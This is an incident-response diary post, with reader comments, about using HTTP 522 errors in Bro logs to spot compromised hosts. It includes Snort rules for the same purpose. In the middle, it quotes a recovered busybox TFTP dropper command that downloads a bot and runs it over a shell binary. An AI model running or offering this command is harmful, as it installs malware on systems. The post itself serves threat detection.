522 Error Code for the Win

Published: 2016-08-17
Last Updated: 2016-08-17 01:36:37 UTC
by Tom Webb (Version: 1)
2 comment(s)


Recently I ran across a tweet from Packet Watcher @jinq102030 (https://twitter.com/jinq102030/status/756476442590842880)  to keep an eye on HTTP error code 522 for possible malware check-ins. 522 code could mean several things, but as for IR it's a potential malicious host has been pulled offline and you have a client still trying to connect.    So I got our Intern to check bro logs and see what he could find. 

>zcat http* | bro-cut ts id.orig_h id.resp_h host status_code | awk '$5 == "522"


1467159441.247406    -    522
1467160356.407366    -    522
1467161271.647320    -    522
1467163102.087490    -    522
1467164017.337316    -    522
1467164932.547084    -    522
1467182323.201685    -    522
1467183238.447046    -    522
1467184153.641505    -    522
1467185068.903194    -    522


There was other traffic that was false positives, but you could easily tell that this IP was checking this site on a regular basis.  Out of 4GB of compressed bro logs for the day we only had about  200 total lines that matched, so very low noise ratio.

When looking at the full packet capture of the system in question, we were able to tell that the system in question was compromised and downloaded a bot . 


cd /tmp || cd /var/ || cd /dev/;busybox tftp -r min -g;cp /bin/sh .;cat min >sh;chmod 777 sh;./sh.

This is certainly something we are going to keep looking at for finding more compromised system.


Tom Webb


2 comment(s)


That is a nice thing to check for.

I made a SNORT IDS rule for that.

alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"NF - Error 522 - Connection timed out - Check client for compromise"; content:"522"; http_stat_code; reference:url,isc.sans.edu/forums/diary/522+Error+Code+for+the+Win/21377/; reference:url,networkforensic.dk; metadata:18082016; priority:2; sid:6001948; rev:1;)

Happy hunting
Oh nice signature, may I respectfully recommend flow:established,from_server and classtype:bad-unknown?

alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"NF - Error 522 - Connection timed out - Check client for compromise"; flow:established,from_server; content:"522"; http_stat_code; reference:url,isc.sans.edu/forums/diary/522+Error+Code+for+the+Win/21377/; reference:url,networkforensic.dk; classtype:bad-unknown; metadata:18082016; priority:2; sid:6001948; rev:2;)

Nathan Fowler

Diary Archives